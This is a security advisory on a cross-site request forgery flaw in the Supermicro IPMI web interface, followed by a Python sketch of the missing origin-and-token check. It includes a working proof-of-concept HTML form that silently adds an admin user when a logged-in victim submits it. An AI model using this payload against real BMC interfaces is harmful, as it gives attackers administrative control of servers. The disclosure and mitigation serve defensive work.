• metin yunus kandemir

Supermicro IPMI WEBGUI Cross-Site Request Forgery

The web interface of Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cross-site request forgery vulnerability to add new admin users.

The request that adds a new user with admin privileges contains no token parameter.

Assume that the victim has an authorized session on the Supermicro WEBGUI and visits an attacker's web page containing the following HTML:

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
  <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
    <input type="hidden" name="username" value="JOKER" />
    <input type="hidden" name="original&#95;username" value="2" />
    <input type="hidden" name="password" value="onebadday" />
    <input type="hidden" name="new&#95;privilege" value="4" />
    <input type="submit" value="submit request" />
  </form>

If the victim clicks the "submit request" button, the attacker's page triggers an HTTP request that adds a new admin user to the Supermicro WEBGUI.
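The check whose absence is described above, sketched as an added example (not Supermicro's code and not part of the original advisory): a server-side gate that refuses the user-creation request unless it comes from the interface's own origin and carries a token bound to the session. The `csrf_token` field, the function names, and the host and session values are hypothetical.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical names throughout; this is not Supermicro firmware code.
SERVER_KEY = secrets.token_bytes(32)        # per-boot secret kept on the server
STATE_CHANGING = {"/cgi/config_user.cgi"}   # endpoint targeted by the PoC form

def issue_token(session_id: str) -> str:
    """Token the server embeds in its own forms, bound to one session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict, host: str) -> bool:
    """Accept only requests whose Origin (or Referer) names this host."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                        # fail closed when both are absent
    parts = urlsplit(source)
    return parts.scheme == "https" and parts.netloc == host

def allow_request(method, path, headers, form, session_id, host):
    """Return (allowed, reason) for one already-authenticated request."""
    if method != "POST" or path not in STATE_CHANGING:
        return True, "not a protected action"
    if not same_origin(headers, host):
        return False, "cross-site origin"
    supplied = form.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):   # constant-time compare
        return False, "missing or invalid token"
    return True, "ok"

# Constructed sample input: the PoC's form fields, plus made-up host/session.
HOST = "bmc.example.test"
SESSION = "constructed-session-id"
POC_FORM = {"username": "JOKER", "original_username": "2",
            "password": "onebadday", "new_privilege": "4"}

if __name__ == "__main__":
    forged = allow_request("POST", "/cgi/config_user.cgi",
                           {"Origin": "https://attacker.example"},
                           POC_FORM, SESSION, HOST)
    print(forged)
```

Either check alone stops the form above; the token is the stronger of the two because it does not depend on headers the browser may omit.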
